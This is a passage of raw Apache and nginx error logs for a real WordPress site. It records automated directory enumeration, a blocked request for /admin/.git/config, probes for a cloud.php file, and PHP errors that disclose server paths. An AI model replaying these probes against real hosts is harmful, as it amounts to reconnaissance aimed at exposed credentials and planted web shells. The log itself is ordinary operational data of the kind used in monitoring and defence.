140027553285888] [client 45.80.158.104:42330] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 21 20:02:50.125579 2024] [:error] [pid 32332:tid 140027561678592] [client 45.80.158.104:42332] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 21 20:03:29.674001 2024] [autoindex:error] [pid 14415:tid 140027578464000] [client 45.80.158.104:42430] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/01/21 20:25:11 [error] 31281#31281: *43093 access forbidden by rule, client: 34.230.36.192, server: mail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Jan 22 03:06:27.636288 2024] [ssl:warn] [pid 16537:tid 140118596208512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 22 03:06:39.846750 2024] [ssl:warn] [pid 16541:tid 140118596208512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 22 03:06:40.221017 2024] [ssl:warn] [pid 16541:tid 140118596208512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 22 03:06:42.142807 2024] [ssl:warn] [pid 16541:tid 140118596208512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 22 03:06:44.444724 2024] [ssl:warn] [pid 16957:tid 140130738067328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 22 03:06:52.639644 2024] [ssl:warn] [pid 16962:tid 140130738067328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 22 14:50:28.467691 2024] [autoindex:error] [pid 16983:tid 140130530141952] [client 193.46.255.175:59058] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:29.672650 2024] [autoindex:error] [pid 4537:tid 140130278893312] [client 193.46.255.175:59062] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:31.124317 2024] [autoindex:error] [pid 4537:tid 140130337642240] [client 193.46.255.175:59066] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:32.618933 2024] [autoindex:error] [pid 17650:tid 140130320856832] [client 193.46.255.175:59072] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:33.705332 2024] [autoindex:error] [pid 4537:tid 140130379605760] [client 193.46.255.175:59076] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:35.478544 2024] [autoindex:error] [pid 4572:tid 140130320856832] [client 193.46.255.175:59078] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:36.525713 2024] [autoindex:error] [pid 4572:tid 140130354427648] [client 193.46.255.175:59080] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:37.638125 2024] [autoindex:error] [pid 4745:tid 140130513356544] [client 193.46.255.175:59082] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:56.916584 2024] [autoindex:error] [pid 4745:tid 140130287286016] [client 193.46.255.175:59108] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:50:59.643181 2024] [:error] [pid 4745:tid 140130379605760] [client 193.46.255.175:59110] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:50:59.643460 2024] [:error] [pid 4745:tid 140130379605760] [client 193.46.255.175:59110] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:50:59.643622 2024] [:error] [pid 4745:tid 140130379605760] [client 193.46.255.175:59110] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:50:59.643816 2024] [:error] [pid 4745:tid 140130379605760] [client 193.46.255.175:59110] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:51:01.114263 2024] [autoindex:error] [pid 4745:tid 140130396391168] [client 193.46.255.175:59112] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:51:02.381482 2024] [autoindex:error] [pid 4745:tid 140130413176576] [client 193.46.255.175:59114] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:51:04.066179 2024] [autoindex:error] [pid 4745:tid 140130504963840] [client 193.46.255.175:59116] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:51:05.115162 2024] [autoindex:error] [pid 16983:tid 140130421569280] [client 193.46.255.175:59118] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:51:06.451643 2024] [autoindex:error] [pid 16983:tid 140130379605760] [client 193.46.255.175:59120] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2024/01/22 14:51:15 [error] 16939#16939: *53491 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 193.46.255.175, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com", referrer: "www.google.com" [Mon Jan 22 14:51:17.931672 2024] [autoindex:error] [pid 16983:tid 140130337642240] [client 193.46.255.175:59130] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2024/01/22 14:51:28 [error] 16938#16938: *53500 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 193.46.255.175, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com", referrer: "www.google.com" [Mon Jan 22 14:51:29.961557 2024] [autoindex:error] [pid 4327:tid 140130538534656] [client 193.46.255.175:59138] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:51:53.164010 2024] [autoindex:error] [pid 16983:tid 140130504963840] [client 193.46.255.175:59150] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:52:14.730015 2024] [autoindex:error] [pid 4327:tid 140130371213056] [client 193.46.255.175:59172] AH01276: Cannot serve directory /home/investig/public_html/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:09.350197 2024] [autoindex:error] [pid 16982:tid 140130413176576] [client 193.46.255.175:59206] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:10.824610 2024] [autoindex:error] [pid 4327:tid 140130337642240] [client 193.46.255.175:59208] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:11.917625 2024] [autoindex:error] [pid 16982:tid 140130295678720] [client 193.46.255.175:59210] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:13.104768 2024] [autoindex:error] [pid 16982:tid 140130513356544] [client 193.46.255.175:59216] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:14.492237 2024] [autoindex:error] [pid 16982:tid 140130287286016] [client 193.46.255.175:59220] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:15.691065 2024] [:error] [pid 4537:tid 140130371213056] [client 193.46.255.175:59234] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:53:15.691362 2024] [:error] [pid 4537:tid 140130371213056] [client 193.46.255.175:59234] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:53:15.691542 2024] [:error] [pid 4537:tid 140130371213056] [client 193.46.255.175:59234] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:53:15.691763 2024] [:error] [pid 4537:tid 140130371213056] [client 193.46.255.175:59234] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jan 22 14:53:17.999935 2024] [autoindex:error] [pid 16982:tid 140130546927360] [client 193.46.255.175:59238] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:19.084812 2024] [autoindex:error] [pid 16982:tid 140130312464128] [client 193.46.255.175:59240] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:20.621734 2024] [autoindex:error] [pid 4745:tid 140130337642240] [client 193.46.255.175:59242] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:21.390275 2024] [autoindex:error] [pid 16983:tid 140130320856832] [client 193.46.255.175:59244] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:22.308175 2024] [autoindex:error] [pid 4572:tid 140130413176576] [client 193.46.255.175:59246] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:23.570914 2024] [autoindex:error] [pid 16982:tid 140130396391168] [client 193.46.255.175:59248] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:25.260454 2024] [autoindex:error] [pid 4395:tid 140130304071424] [client 193.46.255.175:59250] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:26.300078 2024] [autoindex:error] [pid 16983:tid 140130538534656] [client 193.46.255.175:59252] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:26.866875 2024] [autoindex:error] [pid 16983:tid 140130278893312] [client 193.46.255.175:59254] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:27.934577 2024] [autoindex:error] [pid 4571:tid 140130530141952] [client 193.46.255.175:59256] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:28.909743 2024] [autoindex:error] [pid 16983:tid 140130287286016] [client 193.46.255.175:59258] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:29.779302 2024] [autoindex:error] [pid 16983:tid 140130530141952] [client 193.46.255.175:59260] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Utility/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:30.644033 2024] [autoindex:error] [pid 16983:tid 140130546927360] [client 193.46.255.175:59262] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:31.254294 2024] [autoindex:error] [pid 16982:tid 140130421569280] [client 193.46.255.175:59264] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:31.913824 2024] [autoindex:error] [pid 4327:tid 140130320856832] [client 193.46.255.175:59266] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:34.821258 2024] [autoindex:error] [pid 4537:tid 140130546927360] [client 193.46.255.175:59268] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:39.792328 2024] [autoindex:error] [pid 4537:tid 140130304071424] [client 193.46.255.175:59270] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:40.658170 2024] [autoindex:error] [pid 4485:tid 140130521749248] [client 193.46.255.175:59272] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:41.655920 2024] [autoindex:error] [pid 4537:tid 140130521749248] [client 193.46.255.175:59274] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:42.598142 2024] [autoindex:error] [pid 16983:tid 140130421569280] [client 193.46.255.175:59276] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:43.181813 2024] [autoindex:error] [pid 4537:tid 140130295678720] [client 193.46.255.175:59278] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:44.707164 2024] [autoindex:error] [pid 4537:tid 140130387998464] [client 193.46.255.175:59280] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:46.221051 2024] [autoindex:error] [pid 4537:tid 140130530141952] [client 193.46.255.175:59282] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:47.499825 2024] [autoindex:error] [pid 4537:tid 140130362820352] [client 193.46.255.175:59284] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:52.466056 2024] [autoindex:error] [pid 4327:tid 140130504963840] [client 193.46.255.175:59294] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex 